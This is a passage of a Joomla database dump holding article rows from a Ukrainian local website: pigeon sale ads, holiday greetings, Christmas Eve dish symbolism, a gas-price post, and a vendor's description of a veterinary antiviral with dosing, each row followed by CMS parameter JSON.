00:00:00','2020-11-08 18:31:46','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,29,'','',1,552,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2488,2909,'Поштові голуби.','poshtovi-golubi','<!--StartFragment--><p style=\"text-align: left;\"><span style=\"font-family: Times New Roman,Times; font-size: 15px;\">В наявності є птиця 20 року так і минулих років. Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Овруч. Ціна 100, телефонуйте 0508320922, домовимось</span>.</p><p><img alt=\"\" class=\"fr-fin fr-dii\" src=\"https://malehus.in.ua/images/stories/12_1.jpg\" width=\"456\"><img alt=\"\" class=\"fr-fin fr-dii\" src=\"https://malehus.in.ua/images/stories/12_2.jpg\" width=\"364\"><br></p><p><br><img alt=\"\" class=\"fr-fin fr-dii\" src=\"https://malehus.in.ua/images/stories/12_5.jpg\" width=\"863\">&nbsp;&nbsp;</p><p><img alt=\"\" class=\"fr-fil fr-dib\" src=\"https://malehus.in.ua/images/stories/12_3.jpg\" title=\"\" width=\"388\"><img alt=\"\" class=\"fr-fil fr-dib\" src=\"https://malehus.in.ua/images/stories/12_6.jpg\" width=\"392\"><img alt=\"\" class=\"fr-fil fr-dib\" src=\"https://malehus.in.ua/images/stories/12_4.jpg\" title=\"\" width=\"393\"></p><!--EndFragment-->','',1,126,'2020-12-15 18:20:08',430,'','2020-12-15 18:40:48',430,0,'0000-00-00 00:00:00','2020-12-15 18:20:08','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',7,8,'','',1,352,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2489,2910,'Кінги 20 року','kingi-20-roku','<!--StartFragment--><p>В наявності є два молодих кінга. Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Овруч. Ціна 300, телефонуйте 0508320922, домовимось.</p><p><img alt=\"\" class=\"fr-fin fr-dii\" src=\"https://malehus.in.ua/images/stories/12_k_1.jpg\" width=\"576\"><br></p><p><img alt=\"\" class=\"fr-fin fr-dii\" src=\"https://malehus.in.ua/images/stories/12_k_2.jpg\" width=\"577\"><br></p><p><img alt=\"\" class=\"fr-fin fr-dii\" src=\"https://malehus.in.ua/images/stories/12_k_3.jpg\" width=\"578\"><br></p><!--EndFragment-->','',1,127,'2020-12-15 18:54:14',430,'','2020-12-15 18:57:23',430,0,'0000-00-00 00:00:00','2020-12-15 18:54:14','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,3,'','',1,146,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2490,2912,'Останні осінні дні в Малині','ostanni-osinni-dni-v-malini','	<p><img src=\"https://malehus.in.ua/images/stories/1612_1.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></p>','',1,8,'2020-12-16 12:44:34',430,'','2020-12-16 12:44:47',430,0,'0000-00-00 00:00:00','2020-12-16 12:44:34','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,28,'','',1,34,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2491,2913,'Останні ( вже історичні матеріали) щодо виконання дохідної частини бюджетів міст, районів та ОТГ за 11 місяців 2020 року','ostanni-vzhe-istorichni-materiali-shchodo-vikonannya-dokhidnoji-chastini-byudzhetiv-mist-rajoniv-ta-otg-za-11-misyatsiv-2020-roku','	<p>За даними Департамента фінансів Житомирської ОДА<img src=\"https://malehus.in.ua/images/stories/censor.jpg\" alt=\"\" class=\"fr-fir\">&nbsp;</p>','',1,8,'2020-12-16 12:56:10',430,'','2020-12-16 12:56:27',430,0,'0000-00-00 00:00:00','2020-12-16 12:56:10','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,27,'','',1,96,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2492,2914,'21 грудня 2020','21-grudnya-2020','<p><img src=\"https://malehus.in.ua/images/stories/20201221_03.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></p><p><img src=\"https://malehus.in.ua/images/stories/20201221_05.jpg\" alt=\"\" class=\"fr-dii fr-fin\"><br></p>','',1,8,'2020-12-21 14:54:47',430,'','2020-12-21 14:54:47',0,0,'0000-00-00 00:00:00','2020-12-21 14:54:47','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,26,'','',1,394,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2493,2915,'З Новим 2021 роком!','z-novim-2021-rokom','<p><img alt=\"\" class=\"fr-fin fr-dii\" src=\"https://malehus.in.ua/images/stories/2021_1.jpg\" width=\"850\"></p>','',1,8,'2020-12-29 12:52:22',430,'','2020-12-29 12:52:58',430,0,'0000-00-00 00:00:00','2020-12-29 12:52:22','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,25,'','',1,40,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2494,2917,'Сніданок в новому році','snidanok-v-novomu-rotsi','	<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/SZ03gAXqa4A\" width=\"560\"></iframe></span></p>','',1,136,'2021-01-02 15:24:22',430,'','2021-01-02 15:24:27',430,0,'0000-00-00 00:00:00','2021-01-02 15:24:22','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,1,'','',1,212,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2495,2918,'Радісних Різдвяних Свят!','veselikh-rizdvyanikh-svyat','		<p><img src=\"https://malehus.in.ua/images/stories/4293668.gif\" alt=\"\" class=\"fr-dii fr-fin\"></p>','',1,8,'2021-01-04 08:25:38',430,'','2021-01-04 08:26:31',430,0,'0000-00-00 00:00:00','2021-01-06 08:25:38','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,24,'','',1,57,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2496,2919,'Що повинно бути на столі на СВЯТ-ВЕЧІР','shcho-povinno-buti-na-stoli-na-svyat-vechir','<p><img src=\"https://malehus.in.ua/images/stories/rizdvo.jpg\" alt=\"\" class=\"fr-fin\" width=\"866\"><br></p><p>Кожна з 12 страв та деякі продукти, які входять до неї,  мають глибоке символічне значення, а не просту традиційність.</p><p>КУТЯ (найголовніша страва на столі, з неї починають  трапезу) символізує єднання з Богом і світом померлих. Тому її залишають на ніч  для душ усопших, не прибирають зі столу.</p><p>МАК, який додають до куті, символізує мучеництво Ісуса  Христа.</p><p>МЕД — символ чистоти, надії, оптимізму, солодкого Божого  Слова.</p><p>КОРАЧУН (кругла буханка хліба, інколи домашньої випічки,  калач) символізує смерть і воскресіння.</p><p>ГОРОХ, КВАСОЛЯ — символ християнського життя у  \"домашній\", \"сімейній церкві\", символ єдності роду.</p><p>КАПУСНЯК — символ єдності навколо однієї основи —  Христа-Бога.</p><p>БОРЩ нагадує про дітей, убитих у Вифлеємську ніч за  наказом Ірода.</p><p>ГОЛУБЦІ - символ голуба, який уособлює мир.</p><p>РИБА — знак християн, один із символів Ісуса Христа. У  перших літерах грецького слова \"риба\" зашифровані слова \"Ісус  Христос\", \"Спаситель\", \"Син Божий\".</p><p>ВАРЕНИКИ — достаток, ситність.</p><p>ГРИБИ — дві природи Ісуса Христа: божественна (шапка) і  земна (корінець).</p><p>ПАМПУШКИ — щастя, здоров\'я, як і вареники — достаток.</p><p>УЗВАР — життя людини, дароване Богом.</p><p>ЧАСНИК — очищення від гріхів. Також символізує здоров\'я. Його кладуть на  чотири кутки столу, а потім споживають, щоб зуби не боліли.</p><!--[if !vml]-->','',1,8,'2021-01-06 07:04:13',430,'','2021-01-06 07:04:13',0,0,'0000-00-00 00:00:00','2021-01-06 07:04:13','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,23,'','',1,137,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2497,2920,'Малин напередодні Різдва','malin-naperedodni-rizdva','<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/Lp2Y9hJGRPs\" width=\"560\"></iframe></span></p>','',1,8,'2021-01-06 07:08:30',430,'','2021-01-06 07:08:30',0,0,'0000-00-00 00:00:00','2021-01-06 07:08:30','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,22,'','',1,53,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2498,2921,'Ціни на природний газ в січні 2021 року','tsini-na-prirodnij-gaz-v-sichni-2021-roku','<p><img alt=\"\" class=\"fr-fin fr-dii\" src=\"https://malehus.in.ua/images/stories/gaz0121.jpg\" width=\"823\"></p><p>За даними&nbsp;<a href=\"https://gazpravda.com.ua/\">https://gazpravda.com.ua/</a></p>','',1,8,'2021-01-09 19:05:00',430,'','2021-01-09 19:05:19',430,0,'0000-00-00 00:00:00','2021-01-09 19:05:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,21,'','',1,222,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2499,2922,'Лозеваль противовірусний препарат','lozeval-protivovirusnij-preparat-100-ml','<p><img src=\"https://malehus.in.ua/images/stories/lozeval.jpg\" alt=\"\" class=\"fr-fil\" width=\"105\">Лозеваль противовирусный, 100 мл - препарат  для профилактики и лечения вирусных и бактериальных заболеваний. Повышает  резистентность организма у животных и птиц. Описание и состав: раствор для внутреннего, наружного и  аэрозольного применения.Фасовка: флакон 100 мл. Фармакологические свойства: Противовирусное действие за счет ингибирования внутриклеточной репродукции  вирусов, обладает бактериостатическими и бактерицидными свойствами по отношению  к грамположительной и грамотрицательной микрофлоре. Лозеваль повышает  резистентность организма животных и птиц за счет стимулирования клеточного и  гуморального иммунитета, усиления синтеза моконуклеаров и повышения уровня  лизоцима.</p><p>Применение:</p><table><tbody><tr><td><p>Назначение</p></td><td><p>Доза</p></td><td><p>Особенности</p></td></tr><tr><td><p>Вирусные    инфекции: аденовирусная инфекция,    парагрипп-3, ринотрахеит, болезнь Ньюкасла, болезнь Марека, инфекционный    бронхит кур, чума плотоядных, парвовирусный энтерит собак, панлейкемия кошек </p></td><td><p>1-2    мл на 10 кг массы, 1-2 раза в сутки </p></td><td><p>Препарат    задается с кормом или выпаивается, в течение 5 дней. После З-х дневного    перерыва, при необходимости, курс повторяют. С профилактической целью    препарат задается в тех же дозах 1 раз в день, 2 дня подряд с недельным    интервалом</p></td></tr><tr><td><p>Бактериальные    инфекции животных и птиц: паратиф, колибактериоз,    стрептококкоз, стафилококкоз, пастереллез </p></td><td><p>1-2    мл на 10 кг массы, 1 раз в сутки  </p></td><td><p>Задается    в течение 5 дней. После 3-х дневного перерыва, при необходимости, курс    повторяют </p></td></tr><tr><td><p>Респираторные    заболевания</p></td><td><p>препарат    разводят 1:1 в 5% растворе глюкозы  </p></td><td><p>Смазывают    или закапывают в носовые ходы. Применяется для аэрозольных обработок    помещения, в концентрации 1-2 мл/м3 с экспозицией 45 мин</p></td></tr><tr><td><p>Кожные    заболевания: дерматит, экзема, рожа,    ожоги, гнойные раны  </p></td><td><p>пораженные    места смазывают 2-3 раза в день </p></td><td><p>применяют наружно до полного выздоровления </p></td></tr><tr><td><p>Отиты</p></td><td><p>препарат    разводят 1:1 в 960 спирте или закапывают в уши по 2-3 капли (без разведения)    2 раза в день</p></td><td><p>в течение 4-5 дней</p></td></tr><tr><td><p>В    акушерско-гинекологической практике</p></td><td><p>вводится    внутриматочно в разведении 1:1 с подсолнечным маслом или в дозе 1 мл на 10 кг    массы тела (без разведения). При маститах препарат    втирается в пораженные доли 3-4 раза в день до полного выздоровления </p></td><td><p>в течение 4-5 дней</p></td></tr><tr><td><p>При    кастрации и косметических операциях</p></td><td><p>раненая    поверхность смазывается 2-3 раза в день </p></td><td><p>применяют до    заживления раны</p></td></tr></tbody></table><p>Побочные  действия: в рекомендуемых дозах не оказывает.</p><p>Противопоказания: не выявлено.</p><p><br></p><p><br></p><!--[if !supportLineBreakNewLine]--><p><br></p><p><br></p><!--[endif]--><p><br></p>','',1,135,'2021-02-03 09:19:56',430,'','2021-02-03 09:44:17',430,0,'0000-00-00 00:00:00','2021-02-03 09:19:56','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',18,0,'','',1,88,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2500,2923,'Перші поштові 2021 року','pershi-poshtovi-2021-roku','<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/f-YZMZAx7ko\" width=\"560\"></iframe></span></p>','',1,126,'2021-02-12 13:56:08',430,'','2021-02-12 13:56:08',0,0,'0000-00-00 00:00:00','2021-02-12 13:56:08','0000-00-00 